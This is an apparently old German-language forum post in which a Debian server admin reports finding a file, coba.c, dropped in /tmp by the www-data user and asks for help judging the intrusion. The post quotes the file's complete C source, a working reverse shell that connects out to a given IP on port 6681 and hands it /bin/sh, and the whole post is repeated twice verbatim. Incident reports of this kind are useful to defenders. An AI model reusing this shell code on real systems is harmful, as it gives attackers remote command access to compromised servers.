ccfritz
11.03.04, 09:30
hi all,
auf einem unserer debian server (woody), fand ich heute im /tmp/ eine datei namens
coba.c
sie wurde vom www-data in der gruppe www-data angelegt.
habe alle pakete vom debian direkt installaiert -> also nichts selbst "gebaut".
der inhalt der datei sieht so aus:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 6681;
struct sockaddr_in addr;
char shell[] = "/bin/sh";
char mess[] = "\ndup!\n";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n %s <ipaddr>\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*) &addr, sizeof(addr));
send(fd, mess, sizeof(mess), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "bash", 0);
close(fd);
return 1;
}
sie ist nicht ausführbar.
in meiner kernel.log fan dich zu diesem zeitpunkt folgenden eintrag:
TCP: Treason uncloaked! Peer 202.174.143.90:3343/80 shrinks window 2915742497:2915743227. Repaired.
1. hat das eine mit dem anderen etwas zu tun?
2. habe ich etwas zu befürchten?
es läuft wie gesagt apache darauf (von woody)
kernel ist auch 2.4.25 oben.
3. meine user sind alle auch die ftp user mit /bin/false "bestück" bis auf den www-data, sollte ich diesen eventuell ebenfalls mit /bin/false "bestücken" ?
danke
auf einem unserer debian server (woody), fand ich heute im /tmp/ eine datei namens
coba.c
sie wurde vom www-data in der gruppe www-data angelegt.
habe alle pakete vom debian direkt installaiert -> also nichts selbst "gebaut".
der inhalt der datei sieht so aus:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
int fd, sock;
int port = 6681;
struct sockaddr_in addr;
char shell[] = "/bin/sh";
char mess[] = "\ndup!\n";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n %s <ipaddr>\n", argv[0]);
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*) &addr, sizeof(addr));
send(fd, mess, sizeof(mess), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "bash", 0);
close(fd);
return 1;
}
sie ist nicht ausführbar.
in meiner kernel.log fan dich zu diesem zeitpunkt folgenden eintrag:
TCP: Treason uncloaked! Peer 202.174.143.90:3343/80 shrinks window 2915742497:2915743227. Repaired.
1. hat das eine mit dem anderen etwas zu tun?
2. habe ich etwas zu befürchten?
es läuft wie gesagt apache darauf (von woody)
kernel ist auch 2.4.25 oben.
3. meine user sind alle auch die ftp user mit /bin/false "bestück" bis auf den www-data, sollte ich diesen eventuell ebenfalls mit /bin/false "bestücken" ?
danke